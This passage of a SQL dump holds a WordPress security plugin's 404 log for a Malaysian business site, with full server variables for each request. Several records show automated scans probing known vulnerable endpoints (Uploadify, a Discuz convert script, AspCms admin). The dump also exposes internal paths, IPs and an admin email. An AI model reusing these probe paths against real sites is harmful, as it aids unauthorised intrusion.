6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"157.52.144.2\";s:11:\"REMOTE_PORT\";s:5:\"59099\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZd6Muwhi3OTWv4PG6hsqAAAAAE\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570208306.9409\";s:12:\"REQUEST_TIME\";s:10:\"1570208306\";}}','notice','2019-10-04 16:58:28','2019-10-04 16:58:27',35332224,37140808,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'157.52.144.2'),(27493,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZd6JpIMJ2YV4J8bZ@EPBwAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZd6JpIMJ2YV4J8bZ@EPBwAAANc\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:12:\"157.52.144.2\";s:11:\"REMOTE_PORT\";s:5:\"65047\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZd6JpIMJ2YV4J8bZ@EPBwAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570208294.8161\";s:12:\"REQUEST_TIME\";s:10:\"1570208294\";}}','notice','2019-10-04 16:58:17','2019-10-04 16:58:15',35360856,37168368,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'157.52.144.2'),(27492,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZd6ICvh2Xx96vdZGM4cgwAAAQ4\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:12:\"157.52.144.2\";s:11:\"REMOTE_PORT\";s:5:\"55886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZd6ICvh2Xx96vdZGM4cgwAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570208288.7777\";s:12:\"REQUEST_TIME\";s:10:\"1570208288\";}}','notice','2019-10-04 16:58:10','2019-10-04 16:58:09',35379128,37180272,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'157.52.144.2'),(27491,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/manager/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:40:\"https://bintara.com.my/manager/index.php\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/manager/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/manager/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZd5Y5IMJ2YV4J8bZ@EO0wAAAMc\";s:12:\"REDIRECT_URL\";s:9:\"/manager/\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"37226\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/manager/\";s:10:\"SCRIPT_URL\";s:9:\"/manager/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZd5Y5IMJ2YV4J8bZ@EO0wAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570208099.8197\";s:12:\"REQUEST_TIME\";s:10:\"1570208099\";}}','notice','2019-10-04 16:55:02','2019-10-04 16:55:00',35029832,36835952,'https://bintara.com.my/manager/',1,0,'50.63.167.184'),(27490,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/manager/ldskflks\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:38:\"http://bintara.com.my/manager/ldskflks\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/manager/ldskflks\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/manager/ldskflks\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZd5VJIMJ2YV4J8bZ@EO0QAAAMM\";s:12:\"REDIRECT_URL\";s:17:\"/manager/ldskflks\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"34208\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/manager/ldskflks\";s:10:\"SCRIPT_URL\";s:17:\"/manager/ldskflks\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZd5VJIMJ2YV4J8bZ@EO0QAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570208084.2776\";s:12:\"REQUEST_TIME\";s:10:\"1570208084\";}}','notice','2019-10-04 16:54:47','2019-10-04 16:54:44',35517376,37323928,'https://bintara.com.my/manager/ldskflks',1,0,'50.63.167.184'),(27489,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/send-quote-panasonic-toughbook/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:54:\"https://bintara.com.my/send-quote-panasonic-toughbook/\";s:19:\"REDIRECT_SCRIPT_URL\";s:32:\"/send-quote-panasonic-toughbook/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZdt@ivh2Xx96vdZGM4ZqgAAAQs\";s:12:\"REDIRECT_URL\";s:32:\"/send-quote-panasonic-toughbook/\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.150.44\";s:11:\"REMOTE_PORT\";s:5:\"29690\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:54:\"https://bintara.com.my/send-quote-panasonic-toughbook/\";s:10:\"SCRIPT_URL\";s:32:\"/send-quote-panasonic-toughbook/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZdt@ivh2Xx96vdZGM4ZqgAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570205178.3463\";s:12:\"REQUEST_TIME\";s:10:\"1570205178\";}}','notice','2019-10-04 16:06:22','2019-10-04 16:06:18',35419600,37225560,'https://bintara.com.my/send-quote-panasonic-toughbook/',1,0,'54.36.150.44');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (27488,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:58:\"/wp-content/uploads/2018/12/Teamviewer-page.png&imgrefurl=\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:14:\"bytes=0-524287\";s:15:\"HTTP_USER_AGENT\";s:73:\"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png&imgrefurl=\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:58:\"/wp-content/uploads/2018/12/Teamviewer-page.png&imgrefurl=\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZdDdOwhi3OTWv4PG6hheQAAABA\";s:19:\"REDIRECT_SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png&imgrefurl=\";s:19:\"REDIRECT_SCRIPT_URL\";s:58:\"/wp-content/uploads/2018/12/Teamviewer-page.png&imgrefurl=\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZdDdOwhi3OTWv4PG6hheQAAABA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"31.13.115.22\";s:11:\"REMOTE_PORT\";s:5:\"64362\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:80:\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png&imgrefurl=\";s:10:\"SCRIPT_URL\";s:58:\"/wp-content/uploads/2018/12/Teamviewer-page.png&imgrefurl=\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZdDdOwhi3OTWv4PG6hheQAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570194292.3935\";s:12:\"REQUEST_TIME\";s:10:\"1570194292\";}}','notice','2019-10-04 13:04:56','2019-10-04 13:04:52',35522600,35879152,'https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png&imgrefurl=',1,0,'31.13.115.22'),(27487,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:106:\"/teamviewer/&tbnid=2Z6HZAgNda8iWM&vet=1&docid=uVroaOFIIOSRnM&w=700&h=352&itg=1&q=teamviewer&source=sh/x/im\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:14:\"bytes=0-524287\";s:15:\"HTTP_USER_AGENT\";s:73:\"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:128:\"https://bintara.com.my/teamviewer/&tbnid=2Z6HZAgNda8iWM&vet=1&docid=uVroaOFIIOSRnM&w=700&h=352&itg=1&q=teamviewer&source=sh/x/im\";s:19:\"REDIRECT_SCRIPT_URL\";s:106:\"/teamviewer/&tbnid=2Z6HZAgNda8iWM&vet=1&docid=uVroaOFIIOSRnM&w=700&h=352&itg=1&q=teamviewer&source=sh/x/im\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZdDdOwhi3OTWv4PG6hhegAAAAM\";s:12:\"REDIRECT_URL\";s:106:\"/teamviewer/&tbnid=2Z6HZAgNda8iWM&vet=1&docid=uVroaOFIIOSRnM&w=700&h=352&itg=1&q=teamviewer&source=sh/x/im\";s:11:\"REMOTE_ADDR\";s:12:\"31.13.115.22\";s:11:\"REMOTE_PORT\";s:5:\"33122\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:128:\"https://bintara.com.my/teamviewer/&tbnid=2Z6HZAgNda8iWM&vet=1&docid=uVroaOFIIOSRnM&w=700&h=352&itg=1&q=teamviewer&source=sh/x/im\";s:10:\"SCRIPT_URL\";s:106:\"/teamviewer/&tbnid=2Z6HZAgNda8iWM&vet=1&docid=uVroaOFIIOSRnM&w=700&h=352&itg=1&q=teamviewer&source=sh/x/im\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZdDdOwhi3OTWv4PG6hhegAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570194292.7308\";s:12:\"REQUEST_TIME\";s:10:\"1570194292\";}}','notice','2019-10-04 13:04:56','2019-10-04 13:04:53',35039160,35395880,'https://bintara.com.my/teamviewer/&tbnid=2Z6HZAgNda8iWM&vet=1&docid=uVroaOFIIOSRnM&w=700&h=352&itg=1&q=teamviewer&source=sh/x/im',1,0,'31.13.115.22'),(27486,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570187156.9113490581512451171875\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570187156.9113490581512451171875\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, 